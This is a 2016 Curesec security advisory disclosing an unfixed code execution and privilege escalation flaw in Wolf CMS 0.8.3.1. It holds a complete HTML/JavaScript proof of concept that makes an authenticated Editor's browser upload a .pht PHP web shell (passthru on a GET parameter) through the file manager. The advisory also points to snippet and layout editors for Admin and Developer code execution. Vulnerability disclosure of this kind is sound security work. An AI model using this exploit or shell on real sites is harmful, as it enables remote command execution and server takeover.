Wolf CMS v0.8.3.1: Code Execution & Privilege Escalation

Wolf CMS v0.8.3.1: Code Execution & Privilege Escalation

Date: 2016-01-28 09:48:23
Security Advisory – Curesec Research Team

1. Introduction

Affected Product: Wolf CMS v0.8.3.1
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: https://www.wolfcms.org/
Vulnerability Type: Code Execution & Privilege Escalation
Remote Exploitable: Yes
Reported to vendor: 12/10/2015
Disclosed to public: 01/28/2016
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of curesec GmbH

2. Overview

CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Wolf CMS is a content management system written in PHP. In version, it is vulnerable to code execution. Additionally, the distiction between the user roles Editor, Developer, and Admin is weak, as it is possible for a user to escalate their privilege.

An Editor account is required to exploit this issue.

3. Details: Code Execution

Editors cannot upload php or php4 files. They can however upload pht or php5 files, which will be executed by most default apache configurations. Additionally, they can upload .htaccess files, which - if the server parses them - allow PHP code execution with arbitrary files, such as image files.

Proof of Concept:

<html> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://localhost/wolfcms/?/admin/plugin/file_manager/upload", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------45938481419296872941792416751"); xhr.withCredentials = true; var body = "-----------------------------45938481419296872941792416751\r\n" + "Content-Disposition: form-data; name=\"csrf_token\"\r\n" + "\r\n" + "961550c7140afaa6f10acc2be52f91146a1738b3809a55530ee7199d7a777162\r\n" + "-----------------------------45938481419296872941792416751\r\n" + "Content-Disposition: form-data; name=\"upload[path]\"\r\n" + "\r\n" + "/\r\n" + "-----------------------------45938481419296872941792416751\r\n" + "Content-Disposition: form-data; name=\"upload_file\"; filename=\"test.pht\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "\x3c?php \n" + "passthru($_GET[\'x\']);\n" + "\r\n" + "-----------------------------45938481419296872941792416751\r\n" + "Content-Disposition: form-data; name=\"commit\"\r\n" + "\r\n" + "Upload\r\n" + "-----------------------------45938481419296872941792416751--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html>

3. Details: Privilege Escalation

The distinction between the user roles Admin and Developer is meaningless, as both can gain code execution via the snippet and layout editor here:

http://localhost/wolfcms/?/admin/snippet/edit/2 http://localhost/wolfcms/?/admin/layout/edit/3

The distinction between the Editor and Admin role is also weak, as editors are allowed to post JavaScript code, which allows them to escalate their privileges.

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

12/10/2015 Informed Vendor about Issue (no reply)
01/10/2016 Reminded Vendor of Disclosure Date (no reply)
01/28/2016 Disclosed to public